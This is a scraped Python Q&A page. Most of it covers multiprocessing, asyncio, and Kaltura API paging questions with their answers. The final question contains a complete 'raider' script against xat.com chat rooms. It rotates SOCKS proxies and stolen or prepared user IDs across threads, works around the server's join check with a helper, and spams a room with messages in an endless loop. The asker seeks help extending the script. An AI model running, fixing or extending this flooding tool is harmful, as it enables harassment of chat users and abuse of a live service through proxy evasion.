Python multiprocessing don't wait all elements done

Python multiprocessing don't wait all elements done - python

I have the following code
global total_pds
total_pds = []
ksplit = wr.s3.list_objects(pred_path)
ksplit = list(ksplit)
def process(x):
dk = wr.s3.read_parquet(path = pred_path+x,dataset=False)
return dk
def log_result(result):
print(len(total_pds), end = ' ')
total_pds.append(result)
def error_back(error):
print('error', error)
pool = mp.Pool(processes=4,maxtasksperchild=10)
dcms_info = [pool.apply_async(process, args=(spl,), callback = log_result, error_callback = error_back) for spl in ksplit]
for x in dcms_info:
x.wait()
pool.close()
pool.join()
dataset = pd.concat(total_pds, ignore_index=True)
the last element throw me this error:
error("'i' format requires -2147483648 <= number <= 2147483647"
Thank you

Related

Python async dataprocessing function

I want to run the runBacktest() function in async is this possible?
import pandas as pd
from pathlib import Path
from datetime import datetime
from indicators import *
#Loading the file.
dfCryptoCap = pd.read_csv(f"{Path(__file__).parent.resolve()}\CRYPTOCAP_TOTAL, 720_b2571.csv")
dfBtcUsd = pd.read_csv(f"{Path(__file__).parent.resolve()}\INDEX_BTCUSD, 720_17561.csv")
# Add Column for converted unix timestamp to datetime
dfCryptoCap['timeiso'] = pd.to_datetime(dfCryptoCap['time'],unit='s')
dfBtcUsd['timeiso'] = pd.to_datetime(dfBtcUsd['time'],unit='s')
dfCryptoCapHA = generateHeikinAshi(dfCryptoCap)
dfBtcUsdHA = generateHeikinAshi(dfBtcUsd)
results = []
def runBacktest(lenSmooth1, winningLenSmooth1, winningPNL):
dfCryptoCapEMA = dfCryptoCapHA.copy()
dfCryptoCapEMA['open'] = calculateEMA(dfCryptoCapHA['open'], lenSmooth1)
dfCryptoCapEMA['high'] = calculateEMA(dfCryptoCapHA['high'], lenSmooth1)
dfCryptoCapEMA['low'] = calculateEMA(dfCryptoCapHA['low'], lenSmooth1)
dfCryptoCapEMA['close'] = calculateEMA(dfCryptoCapHA['close'], lenSmooth1)
# print(dfCryptoCapSMA1)
portfoliosize = 1000
entryPrice = 0.0
traderesult = 0.0
for i in range(1, len(dfCryptoCapEMA)):
if dfCryptoCapEMA.iloc[i]['close'] > dfCryptoCapEMA.iloc[i]['open'] and dfCryptoCapEMA.iloc[i -1]['close'] <= dfCryptoCapEMA.iloc[i -1]['open']:
btcOHLC = dfBtcUsd.loc[dfBtcUsd['time'] == dfCryptoCapEMA.iloc[i]['time']]
entryPrice = btcOHLC.iloc[0]['close'].tolist()
elif dfCryptoCapEMA.iloc[i]['close'] < dfCryptoCapEMA.iloc[i]['open'] and dfCryptoCapEMA.iloc[i -1]['close'] >= dfCryptoCapEMA.iloc[i -1]['open']:
btcOHLC = dfBtcUsd.loc[dfBtcUsd['time'] == dfCryptoCapEMA.iloc[i]['time']]
try:
traderesult = (btcOHLC.iloc[0]['close'].tolist() - entryPrice) / entryPrice * 100
except:
traderesult = 0
if traderesult > 0:
portfoliosize = portfoliosize * (1 + (traderesult / 100))
elif traderesult < 0:
portfoliosize = portfoliosize * (1 - (abs(traderesult) / 100))
result = f"Round - lenSmooth1 = {lenSmooth1} | PNL = {round(portfoliosize,2)} || currentWinner = {winningLenSmooth1} | currentWinnerPNL = {round(winningPNL,2)}"
#print(result)
if portfoliosize > winningPNL:
results.append(result)
winningPNL = portfoliosize
winningLenSmooth1 = lenSmooth1
return [winningLenSmooth1, winningPNL]
result = []
for x in range(1, 151, 1):
if x == 1:
result = runBacktest(x, 0, 0)
else:
result = runBacktest(x, result[0], result[1])
print(results[len(results) - 1])
Currently, the backtest runs synchronously and with larger datasets each iteration take up to a minute at the moment. I want to speed up the process by run runBacktest() asynchronous with different lenSmooth1 value and review the results at the end.
i tried to add the following to my script but i don't see any improvements in duration
import asyncio
async def run_tasks():
tasks = [runBacktest(x, 0, 0) for x in range(1, 151, 1)]
#await asyncio.wait(tasks)
await asyncio.gather(*tasks)
def main():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(run_tasks())
loop.close()
main()
print(results)

Async will improve performance when you are working with IO operations (e.g. waiting for a response over a network, loading a file, etc.) but it won't do much to help with CPU-bound processes.
This article does a great job of breaking down different means of achieving concurrency in Python. What you're looking for is likely an implementation of the multiprocessing library.

Python multiprocessing multiple iterations

I am trying to use multiprocessing to speed up my data processing. I am working on a machine with 6 Cores, so I want to iterate through a table of 12 million rows, and for each of these rows I iterate through several time steps doing a calculation (executing a function).
This line I would like to split up that it runs in parallel on different cores:
test = [rowiteration(i, output, ini_cols, cols) for i in a] # this should run in parallel
I tried something with
from multiprocessing import Pool
but I did not manage to pass the arguments of the function and the iterator.
I would appreciate any idea. I am new to Python.
This is what i have:
import pyreadr
import pandas as pd
import numpy as np
import time
from datetime import timedelta
import functools
from pathlib import Path
def read_data():
current_path = os.getcwd()
myfile = os.path.join(str(Path(current_path).parents[0]), 'dummy.RData')
result = pyreadr.read_r(myfile)
pc = result["pc"]
u = result["u"]
return pc, u
# add one column per time
def prepare_output_structure(pc):
ini_cols = pc.columns
pc = pc.reindex(columns=[*pc.columns, *np.arange(0, 11), 'cat'], fill_value=0)
pc.reset_index(level=0, inplace=True)
# print(pc.columns, pc.shape, pc.dtypes)
return pc, ini_cols
def conjunction(*conditions):
return functools.reduce(np.logical_and, conditions)
def timeloop(t_final: int, count_final: int, tipo):
if tipo == 'A':
count_ini = 35
else: # B:
count_ini = 30
yy_list = []
for t in np.arange(0, 11):
yy = ((count_final - count_ini) / t_final) * t + count_ini
yy_list.append(int(yy))
return yy_list
def rowiteration(i, output, ini_cols, cols):
c_2: bool = pc.loc[i, 'tipo'] == u.iloc[:, 0].str[:1] # first character of category e.g. 'A1'
c_5: bool = pc.loc[i, 't_final'] >= u.iloc[:, 1] # t_min (u)
c_6: bool = pc.loc[i, 't_final'] <= (u.iloc[:, 2]) # t_max (u)
pc.loc[i, 'cat'] = u[conjunction(c_2, c_5, c_6)].iloc[0, 0]
pc.iloc[i, (0 + (len(ini_cols))+1):(10 + (len(ini_cols))+2)] = timeloop(int(pc.loc[i, 't_final']), int(pc.loc[i, 'count_final']), pc.loc[i, 'tipo'])
out = pd.DataFrame(pc.iloc[i, :])
out = pd.DataFrame(out.transpose(), columns=cols)
output = output.append(out.iloc[0, :])
return output
if __name__ == '__main__':
start_time = time.time()
pc, u = read_data()
nrowpc = len(pc.index)
a = np.arange(0, nrowpc) # filas tabla pc
# print(a, nrowpc, len(pc.index))
pc, ini_cols = prepare_output_structure(pc)
cols = pc.columns
output = pd.DataFrame()
test = [rowiteration(i, output, ini_cols, cols) for i in a] # this should run in parallel
pc2 = pd.concat(test, ignore_index=True)
pc2 = pc2.iloc[:, np.r_[5, (len(ini_cols)+1):(len(pc2.columns))]]
print(pc2.head)
elapsed_time_secs = time.time() - start_time
msg = "Execution took: %s secs (Wall clock time)" % timedelta(milliseconds=elapsed_time_secs)
print(msg)```

Replace your [rowiteration(i, output, ini_cols, cols) for i in a] with:
from multiprocessing import Pool
n_cpu = 10 # put in the number of threads of cpu
with Pool(processes=n_cpu) as pool:
ret = pool.starmap(rowiteration,
[(i, output, ini_cols, cols) for i in a])

Here is an approach that I think solves the problem and that only sends what is necessary to the worker processes. I haven't tested this as is (which would be difficult without the data your code reads in) but this is basic idea:
import multiprocessing as mp
p = mp.Pool(processes=mp.cpu_count())
# Note that you already define the static cols and ini_cols
# in global scope so you don't need to pass them to the Pool.
# ... Other functions you've defined ...
def rowiteration(row):
c_2: bool = row['tipo'] == u.iloc[:, 0].str[:1]
c_5: bool = row['t_final'] >= u.iloc[:, 1]
c_6: bool = row['t_final'] <= (u.iloc[:, 2])
row['cat'] = u[conjunction(c_2, c_5, c_6)].iloc[0, 0]
row[(0 + (len(ini_cols))+1):(10 + (len(ini_cols))+2)] = timeloop(int(row['t_final']), int(row['count_final']), row['tipo'])
return row
out = []
for row in p.imap_unordered(rowiteration, [r for _, r in pc.iterrows()]):
row.index = cols
out.append(cols)
pc2 = pd.DataFrame(out, ignore_index=True)

QUERY_EXCEEDED_MAX_MATCHES_ALLOWED error on Kaltura API (Python)

I'm unable to generate all entries in Kaltura. An ApiException with the message "Unable to generate list. max matches value was reached" (Error: QUERY_EXCEEDED_MAX_MATCHES_ALLOWED) gets triggered.
I tried to work around such issue by setting my sessionPrivileges to disableentitlement
class class_chk_integrity():
client = None
pagesize = 0
def __init__(self,worker_num, progress):
self.pagesize = 30
self.worker_num = worker_num
self.progress = progress
config = KalturaConfiguration(2723521)
config.serviceUrl = "https://www.kaltura.com/"
self.client = KalturaClient(config)
ks = self.client.session.start("KALTURA_ADMIN_SECRET",
"email#email.com",
KalturaPluginsCore.KalturaSessionType.ADMIN,
"KALTURA_PARTNER_ID",
432000,
"disableentitlement")
self.client.setKs(ks)
I also tried to filter based on the id's. However, I can't manage to put the filter.idNotIn to work properly.
def get_total_reg(self, cont, lastEntryIds, lastEntryCreatedAt):
filter = KalturaPluginsCore.KalturaBaseEntryFilter()
if lastEntryIds != "":
filter.idNotIn = lastEntryIds
filter.orderBy = KalturaBaseEntryOrderBy.CREATED_AT_DESC
pager = KalturaPluginsCore.KalturaFilterPager()
pageIndex = 1
entriesGot = 0
pager.pageSize = self.pagesize
pager.setPageIndex = pageIndex
result = self.client.baseEntry.list(filter, pager)
totalCount = result.totalCount
if totalCount > 10000:
totalCount = 9970
if totalCount <= 0:
cont = False
while entriesGot < totalCount:
pager.pageSize = self.pagesize
pageIndex += 1
pager.pageIndex = pageIndex
result = self.client.baseEntry.list(filter, pager)
entriesGot += len(result.objects)
for e in result.objects:
if lastEntryIds == "":
lastEntryIds.append(e.id)
else:
lastEntryIds.append(e.id)
lastEntryCreatedAt = e.createdAt
return result.totalCount, self.pagesize, cont, lastEntryIds, lastEntryCreatedAt
This is my how I'm calling the functions
if __name__ == '__main__':
try:
log = _ServiceUtils.log()
log.setup('all', 'integrity')
cont = True
lastEntryIds = []
lastEntryCreatedAt = 0
while cont is True:
kmc = class_chk_integrity(0,0)
kmc_total_reg, kmc_page_size, cont, lastEntryIds, lastEntryCreatedAt = kmc.get_total_reg(cont, lastEntryIds, lastEntryCreatedAt)
interval = 10
max_threads = math.ceil(kmc_total_reg / (interval * kmc_page_size))
# max_threads = 1
threads_list = []
print('TOTAL REG : %s | PAGE_SIZE : %s | INTERVAL : %s | THREADS : %s' % (kmc_total_reg,kmc_page_size,interval,max_threads))
progress = class_progress_thread(max_threads)
for index in range(0,max_threads):
page_ini = index * interval
page_end = index * interval + interval
progress.add_worker_progress(index,datetime.now())
threads_list.append(threading.Thread(target=thread_chk_integrity, args=(index, log, index * interval + 1,index * interval + interval,progress)))
threads_list.append(threading.Thread(target=thread_output_progress, args=(progress,max_threads)))
for thread in threads_list:
thread.start()
for thread in threads_list:
thread.join()
while not progress.stop(): time.sleep(30)
except KeyboardInterrupt:
try:
sys.exit(0)
except SystemExit:
os._exit(0)
I'd appreciate any help with this.
Thank you for your attention.

if totalCount > 10000:
totalCount = 9970
I'm curious to know why you are changing the totalCount this way.
Short answer - paging works as long as the result set is up to 10K.
To work around that, sort the result by creation date (as you did), and when you get to 10K, start with a new search where the created_at date in the filter is the last value you got in the previous search. Reset your paging of course.

Python multiprocessing not running

I tried to use multiprocessing on this for loop:
def segment_features(segment_pixels):
features = []
npixels, nbands = segment_pixels.shape
for b in range(nbands):
stats = scipy.stats.describe(segment_pixels[:, b])
band_stats = list(stats.minmax) + list(stats)[2:]
if npixels == 1:
# in this case the variance = nan, change it 0.0
band_stats[3] = 0.0
features += band_stats
return features
segment_ids = np.unique(segments)
objects = []
object_ids = []
for id in segment_ids:
segment_pixels = img[segments == id]
object_features = segment_features(segment_pixels)
objects.append(object_features)
object_ids.append(id)
By replacing the for loop section with this:
def segment_features_calc(segment_pixels):
segment_pixels = img[segments == id]
object_features = segment_features(segment_pixels)
objects.append(object_features)
object_ids.append(id)
print("segment "+str(id)+" features calculated")
n=mp.cpu_count()
if__name__ == '__main__':
p = mp.Pool(processes = n)
start = time.time()
async_result = p.map_async(segment_features_calc,list(segment_ids))
p.close()
p.join()
print("Complete")
end = time.time()
print('total time (s)= ' + str(end-start))
However, the multiprocessing does not get executed properly (multiprocessing stops after 0.17 seconds whereas the items to loop are close to 270,000+ segment IDs). Any insights on how to solve the issue?

Python Multi-Threading, append different values to a method

See the code below, "J2".
In the xml j2 as you can see "Y=getY" it's doing that for each id+pproxy(multithreading)
Now what I want is, I want it to continue changing id and k2= but use the same Y for only 3 times. Then after that get a new Y and do the same..
So for example
<j2 Y="one value" id="3 multi threads pass trough" k="3 multi threads"
and then after that <j2 Y="new y value because only 3 ids can pass through one Y" id="same again" k="same again">
j2 = str('<j2 cb="'+rcv.attrib["c"]+'" Y="'+str(Y[0])+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')
The Y value should be the same while 3 ids pass through it, then when 3 have passed through it, grab a new Y value.
Take a look at this script:
import socket, socks
import xml.etree.ElementTree as tree
import time, random, urllib2
import threading
from itertools import izip
def gB(data,first,last):
x=len(first)
begin = data.find(first) + x
end = data.find(last,begin)
return data[begin:end]
def isInt(buf):
try:
i = int(buf)
return True
except:
return False
def ip(roomname):
if isInt(roomname):
room = roomname
else:
room = gB(urllib2.urlopen('http://xat.com/'+roomname).read(),'FlashVars="id=','&xc=')
room = int(room)
x = urllib2.urlopen('http://xat.com/web_gear/chat/ip.htm?'+str(time.time())).read()
x = tree.fromstring(x)
xSock = x.attrib['xSock'].split(',')
rSock = []
while len(rSock) < 4:
rSock.append(xSock[len(rSock) * 4 + random.randint(0,1)])
return rSock[(room & 96) >> 5],int(10007 + (room % 32)),room
def parseID(auser3):
auser3 = auser3.split('&')
userid = auser3[1].split('=')[1]
k1 = auser3[2].split('=')[1]
k2 = auser3[3].split('=')[1]
return [userid,k1,k2]
return l5
def getY(au, p0, p1, p2, p3, yi):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.settimeout(10)
sock.connect(("127.0.0.1",1337))
sock.send(au+"_"+p0+"_"+p1+"_"+p2+"_"+p3+"_"+yi)
data = sock.recv(1270)
parse = data.split("\"")
sock.close()
print "Y => "+parse[1]+" L5 => "+parse[3]
return [parse[1], parse[3]]
def raider(a3,p):
info = ip(chat)
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, p[0], int(p[1]))
socket.test = socks.socksocket
xat = socket.test(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
xat.settimeout(10)
xat.connect((info[0],int(info[1])))
xat.send('<y r="'+str(info[2])+'" />\0')
bypass = xat.recv(1024)
print "\nRecv --> "+bypass+"\n"
rcv = tree.fromstring(bypass.strip("\0"))
if 'i' not in rcv.attrib:
raise Exception("YUP")
import pprint
pprint.pprint(a3)
uid = a3[0]
k = a3[1]
if 'au' in rcv.attrib:
Y = getY(rcv.attrib["au"], rcv.attrib["p"].split("_")[0],rcv.attrib["p"].split("_")[1],rcv.attrib["p"].split("_")[2],rcv.attrib["p"].split("_")[3], rcv.attrib["i"])
j2 = str('<j2 cb="'+rcv.attrib["c"]+'" Y="'+str(Y[0])+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')
xat.send(j2)
print "\nSend [Bypass] --> "+j2+"\n"
else:
Y = getY(str(0), rcv.attrib["p"].split("_")[0],rcv.attrib["p"].split("_")[1],rcv.attrib["p"].split("_")[2],rcv.attrib["p"].split("_")[3], rcv.attrib["i"])
j2 = str('<j2 cb="'+rcv.attrib["c"]+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')
xat.send(j2)
print "\nSend --> "+j2+"\n"
while 1:
time.sleep(1)
xat.send('<m t=" | XAT IS CORRUPT | " u="'+uid+'" />\0')
except:
pass
chat = raw_input("Chat to raid: ")
ids = [i.strip() for i in open('ids.txt','r')]
proxies = [i.strip() for i in open('socks.txt','r')]
for (i,j) in izip(ids,proxies):
i = parseID(i)
j = j.split(':')
threading.Thread(target=raider,args=(i,j)).start()

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.

Python multiprocessing don't wait all elements done - python

Related

Python async dataprocessing function

Python multiprocessing multiple iterations

QUERY_EXCEEDED_MAX_MATCHES_ALLOWED error on Kaltura API (Python)

Python multiprocessing not running

Python Multi-Threading, append different values to a method

Categories

Resources